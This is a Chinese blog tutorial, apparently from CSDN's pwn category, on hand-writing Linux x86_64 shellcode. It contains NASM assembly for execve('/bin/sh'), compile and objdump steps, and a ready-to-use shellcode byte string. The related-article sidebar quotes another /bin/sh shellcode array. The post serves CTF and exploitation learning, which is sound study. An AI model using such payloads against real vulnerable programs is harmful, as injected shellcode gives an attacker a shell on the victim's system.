linux手写x64的shellcode

最新推荐文章于 2024-08-13 19:15:24 发布
最新推荐文章于 2024-08-13 19:15:24 发布
阅读量1.3k 收藏 4
点赞数
分类专栏: pwn linux 文章标签: linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/flurry_rain/article/details/119906719
版权
"本文详细解析了如何使用x64汇编语言执行execve系统调用,包括处理长字符串参数和栈内存布局,重点演示了如何执行如`execve("/usr/bin/mytest",{"/usr/bin/mytest","argvs"}

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

x64的寄存器基础

x86_64有16个64位寄存器,其中:
rax:常用来存放函数的返回值,系统调用之前用于存放调用号
rbp:栈帧寄存器
rsp:栈顶指针寄存器
rdi、rsi、rdx、rcx、r8、r9:存放函数参数,函数参数按照从左到右的顺序依次存入这几个寄存器,还有更多的参数则存入栈
rbx、rbp、r12、r13、r14、r15:用来存放数据,遵循被调用者使用规则,简单说就是可以直接拿来使用

编写汇编代码

下面的代码实现的是执行 execve("/bin/sh") 命令,rax寄存器存放execve的系统调用编号,rdi存放的是execve的参数:

section .text
global _start
_start:
push rax
xor rdx, rdx
xor rsi, rsi
mov rbx,'/bin//sh'
push rbx
push rsp
pop rdi
mov al, 59
syscall

关于x64的系统调用表可参考如下博文:
https://blog.youkuaiyun.com/SUKI547/article/details/103315487
把上述代码存放在test.asm文件中

编译汇编代码

nasm -f elf64 -o shell.o test.asm
ld shell.o -o shellcode

执行完上述命令后,会生成一个名为shellcode的可执行文件,运行shellcode可得到shell:
在这里插入图片描述

使用objdump获取反汇编代码:

objdump --disassemble ./shellcode

下图圈出的即为shellcode代码:
在这里插入图片描述
shellcode="\x50\x48\x31\xd2\x48\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x54\x5f\xb0\x3b\x0f\x05"

一点延申

简单总结一下上面的例子就是往栈空间里写入了/usr/bin字符串(字符串起始地址存在rdi寄存器),然后把这个字符串作为59号系统调用(execve)的第一个参数,使用syscall调用该系统调用即可实现**execve("/bin/sh")**命令,获取到shell
但其实上面的例子有几点特殊的地方:

  1. /bin/sh不需要参数,也就是说execve只需要一个入参
  2. /bin/sh长度小于8字节,在64位程序中,栈宽度是8字节

那么问题来了:如果我们想要执行其他命令该怎么构造呢?
其实原理差不多的,比如我们想要执行execve("/usr/bin/mytest", {"/usr/bin/mytest",“argvs”}, 0),思路如下:

  1. 首先/usr/bin/mytest长度超过8字节但没有超过16字节,所以我们使用两块栈即可存放,还有就是
    字符串是以0x0作为终止的
  2. 其次,栈是先入后出的结构,因此我们往栈里面填写参数值时,要把非空参数从右往左填入,拆分长字符串时也要注意要把拆好的字符串从右往左填入,比如/usr/bin/mytest要先填入/mytest然后再填入/usr/bin

综上,我们可以得到汇编代码如下:

global _start
_start:
;执行execve("/usr/bin/mytest", {"/usr/bin/mytest","argvs"}, 0)的汇编代码
xor rbp, rbp ;清空rbp寄存器
xor rax, rax ;清空rax寄存器
xor rbx, rbx ;清空rbx寄存器

;先填入{"/usr/bin/mytest","argvs"}参数
push rax         ; 填入0x0作为字符串终止符
mov rbx, 'argvs' ; 参数没有超过8字节,不需要拆分
push rbx         ; "argvs"入栈
mov rbx, rsp     ; 使用rbx寄存器记录下"argvs"存放的地址

push rax         ; 填入0x0作为字符串终止符
;'/usr/bin/mytest'长度超过了8字节,拆分为/usr/bin和/mytest两部分,从右往左填入
mov rbp, '//mytest' ; 填入/mytest,添加一个/补齐八字节
push rbp
mov rbp, '/usr/bin' ; 填入/usr/bin
push rbp
mov rbp, rsp        ; 使用rbp寄存器记录下'/usr/bin/mytest'存放的地址

;"argvs"'/usr/bin/mytest'放在一段连续的栈地址,构造出{"/usr/bin/mytest","argvs"}
push rax
mov rdx, rsp ; 此时rsp指向的栈存放的是0x0,所以直接把这个作为第三个入参,放在rdx寄存器
push rbx
push rbp
mov rsi, rsp ; 得到第二个入参{"/usr/bin/mytest","argvs"},存入rsi寄存器
mov rdi, rbp ; rbp指向的是"/usr/bin/mytest",作为第一个参数,存入rdi寄存器

; 三个入参已经全了,将execve的调用号(59)存入rax寄存器,调用syscall
mov rax, 59
syscall

把上面的代码存入test.asm文件然后使用如下命令编译链接即可得到test可执行文件:

nasm -f elf64 -o test.o test.asm
ld -o test test.o

Have fun!

参考博客:

https://www.jianshu.com/p/e21dcba5668f

下面的链接有很多现成的shellcode,可以根据需要选用:
https://www.exploit-db.com/shellcodes

how2手写shellcode
Y7472821的博客
10-19 152
羊城杯shellcode怎么写都绕不过,痛定思痛决定好好学一下怎么手写shellcode本文通过例题介绍一下如何手写shellcode来实现我们想要的功能,对于使用工具主动生成shellcode就不再赘述。
X86,X64Shellcode框架
qq_40363731的博客
03-27 373
【代码】X86,X64Shellcode框架。
Linux x86_64 shellcode的编写
小立仔
07-06 2059
Linux x86_64 shellcode的编写
Linux 64位 shellcode
weixin_44442852的博客
10-20 1531
linux exec /bin/sh unsigned char code[] = "\x6a\x3b\x58\x99\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48" "\xc1\xeb\x08\x53\x48\x89\xe7\x52\x57\x48\x89\xe6\xb0\x3b\x0f" "\x05"; int main(int argc, ch...
Linux下的shellcode书写
修养生息,以得佳境
04-01 1093
概述: aleph1书写了这篇经典文章,首先要向他致敬。 tt整理翻译了它,其次就是要向他表示衷心的感谢。 该篇文章由浅入深地详细介绍了整个书写shellcode的步骤, 并给出了图示帮助理解。文章中涉及到了一些工具的使用, 要求具备汇编语言、编译原理的基础知识,如果你对此不 了解的话,我建议你不要看下去,而是应该回头学习更基础 的东西。gdb、objdump、vi、gcc等等工具你必须学会使用,
手写shellcode
tbsqigongzi的博客
10-20 495
rctf_2019_shellcoder--手写汇编
linux上的shellcode写法(pwntools,手写shell)
逆向萌新的博客
07-16 3793
这些连在一起,则生成shell是/bin///之后下面就是调用,movebx,esp这步就是必须存在的,之后中间是调用的方法,最后是调用SYS_execve来运行这个/bin////sh但是如果最后在输入的时候长度不够写入这么多的时候,这个脚本就要更变,在针对没开NX保护的程序的时候,我们可以想着在栈内执行这些,长度还不用,那么我们要进行一个更改。这里就要说到调用规则了,x64下,调用规则是rdi,rsi,rdx,rcx,r8,r9,需要按照这个去调用,这个还是调用规则的问题,最后要变成想要的样子。....
采用汇编手写shellcode写入栈解题ciscn_s_9
最新发布
2301_81504456的博客
08-13 544
因为执行pop ebp 把esp栈顶的值给ebp,esp加4h,执行ret,即pop eip,把修改后的返回地址 0x08048554给eip,esp加4h,此时esp距离s是28h(有点昏,参考其他文章),原先的20h(s的缓冲区已经不够,需要增加8h的大小)需要扩充,利用sub esp,0x28;2.接下来主要看栈的内部分配,已知s的输入点距离ebp为20h,加上ebp的4字节大小,共需要填充24h的shellcode(大小比这小,不够填充字节),再接上ret_addr,此时还未结束。
Linux pwn入门教程(2)——shellcode的使用,原理与变形
xiaoi123的博客
07-03 3991
作者:Tangerine@SAINTSEC0×00 shellcode的使用在上一篇文章中我们学习了怎么使用栈溢出劫持程序的执行流程。为了减少难度,演示和作业题程序里都带有很明显的后门。然而在现实世界里并不是每个程序都有后门,即使是有,也没有那么好找。因此,我们就需要使用定制的shellcode来执行自己需要的操作。首先我们把演示程序~/Openctf 2016-tyro_shellcode1/t...
手搓shellcode的学习记录
weixin_44864859的博客
07-24 519
虽然我们可以利用pwntools自动生成shellcode,也可以利用alpha生成纯字符的shellcode绕过某些限制,但是当程序对输入限制较为严苛时,就不得不和这些自动化工具说再见了。由于之前完全没有手写shellcode的经验,所以本文主要是理解分析其他师傅的shellcode,尝试从中获得技巧和方法(说得明白点就先从照葫芦画瓢开始。。。) 首先直接来看题,这是2020 NUAA CTF的一道题,主要考点是ascii shellcode,难点在于限制只能用0x1f-0x7f的字符,并且buf长度只有
PWN基础10:Ret2Shellcode 32位实例
prettyX的博客
07-14 1165
0x01 Ret2Text的局限性
shellcode linux,书写Linux下自己的shellcode
weixin_42201721的博客
05-25 187
: movl 0x10(%ebp),%edx将NULL的地址赋给edx0x80002ce : int $0x80产生系统调用,进入核心态运行.------------------------------------------------------------------------------------看了上面的代码,现在我们可以把它精简为下面的汇编语言程序:leal string,stri...
linux exec /bin/sh shellcode x86 and x86_64
p0x1307的专栏
07-17 1964
linux/x86/x64 shellcode:exec /bin/sh
linux环境下shellcode的编写:32位和64位
lifanxin的博客
12-10 4593
linux环境下shellcode的编写shellcode的理解使用pwntools工具编写自己实现更精炼的32位shellcode64位shellcode shellcode的理解   我们在做pwn的时候经常需要使用shellcode来获取到flag,那么shellcode如何理解,简单一句话就是:获取到shell的code就是shellcode。   在漏洞利用过程时,我们将精心编制好的shellcode通过有问题的程序写入到内存中,然后执行。该shellcode对应的c语言代码一般为: system
Windows 10_X64环境shellcode编写
Anansi的博客
11-20 2453
环境 windows 10_x64 windbg_x64 x64dbg nasm 适用于 VS 2017 的 x64 本机工具命令提示(安装visual studio会自带) redasm shellcode shellcode是一段用于利用软件漏洞而执行的代码,shellcode为16进制的机器码,因为经常让攻击者获得shell而得名。shellcode常常使用机器语言/汇编编写。 可在暂存器eip溢出后,塞入一段可让CPU执行的shellcode机器码,让电脑可以执行攻击者的任意指令。 虽然现在的操
书写Linux下自己的shellcode
南飞的侯鸟
03-12 1126
 原    作:aleph1 翻译注释:warning3  1999/07 验证修改:scz  2000/01/13 概述:     aleph1书写了这篇经典文章,首先要向他致敬。     tt整
X64汇编 shellcode
qq_31314583的博客
08-17 338
注意对其16字节,因此需要rsp+8对其,其次前四个参数由 rcx,rdx,r8,r9传递。
X64 ShellCode 介绍(翻译)
商少
07-24 2302
X64 ShellCode 介绍(翻译)原文链接 http://mcdermottcybersecurity.com/articles/windows-x64-shellcode介绍       Shellcode是指通过缓冲区溢出类型的安全漏洞将其注入到进程的内存中之后执行的可执行机器代码(以及任何相关数据)。该术语来自早期的一种情况“针对unix 平台的早期攻击中,攻击者通常会执行‘启动she
64位shellcode编程(不错) Windows x64 Shellcode
多媒体编程、网络编程、系统编程、网络安全编程、驱动编程
12-06 4146
原文链接:http://mcdermottcybersecurity.com/articles/windows-x64-shellcode Windows x64 Shellcode January 11, 2011 Contents Introduction RIP-Relative Addressing API Lookup
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值